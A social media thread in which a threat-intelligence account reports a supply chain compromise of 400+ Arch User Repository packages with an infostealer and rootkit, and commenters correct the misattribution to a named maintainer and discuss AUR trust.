gyorbJun 12
IFIN - The Independent Federated Intelligence Network

400+ Arch User Repository packages have been compromised in a massive, sophisticated supply chain attack, including a rootkit installation.

https://discourse.ifin.network/t/400-aur-packages-compromised-with-infostealer-and-rootkit/577

#ThreatIntel #ThreatIntelligence #IFIN

400+ AUR Packages Compromised with Infostealer and Rootkit

Last Updated: 2026-06-12T04:22:42Z (UTC) What’s Happening It appears an AUR package maintainer’s account (arojas) was compromised. The maintainer’s account had write access to over 400 package repos. The compromise was reported and other AUR maintainers have been working to remove the infected packages. The affected packages were modified with preinstall scripts to use npm to install the atomic-lockfile package, a malicious payload. Here’s an example of the change: This blog has a deep d...

IFIN
Jun 12 at 4:36amWeb
Show threadvJun 12
@ifin yay was being weird about gpg keys last time I went to update my arch box and I just updated pacman stuff instead. Good day to be lazy I guess
Show threadRobin CandauJun 12

@ifin @mttaggart The attack was orchestrated by bots accounts and automated scripts, including the impersonation of the git identity of the last committer as an obfuscation method. "arojas" is a trusted Arch Linux developer and he's *not* behind these attacks, he just got his git identity being impersonated in the process, just like a lot of other people.

Could you please remove the wrong and misleading mention of the "arojas" username as being the author behind these attacks please?
Thanks! 🙏

Show threadIFIN - The Independent Federated Intelligence NetworkJun 12
@Antiz
Done. Thank you for the clarification.
@mttaggart
Show threadRobin CandauJun 12
@ifin @mttaggart You're welcome, thanks for your quick actions! 🤗
Show threadLambdaJun 12
@ifin @Antiz @mttaggart what *credible* publications do when they're caught spreading slander due to sloppy research is to publish a retraction owning up to their mistake, rather than silently editing it out.
Show threadIFIN - The Independent Federated Intelligence NetworkJun 12
@lambda @Antiz @mttaggart Thanks for the feedback! Our changes are visible to the public, unlike news publications. But to address your concern, we've added a note addressing the inaccuracy.
Show threadohmrunJun 12
@ifin
Presumably, it's related to the numerous sustained DDOS attacks on aur
Show threadwaldiJun 12
@ifin AUR is not guarded by proper signatures?
Show threadcosararaJun 12
@waldi anyone can sign up for an account and adopt orphaned packages, then push updated PKGBUILDs
Show threadRemi GacogneJun 12
@ifin Nothing sophisticated, really.
Show threadIFIN - The Independent Federated Intelligence NetworkJun 12
@rgacogne
The use of an eBPF rootkit is beyond most supply chain attacks we see.
Show threadEckes Jun 12
@ifin „sophisticated“ as in „Trust me bro I will maintain your package“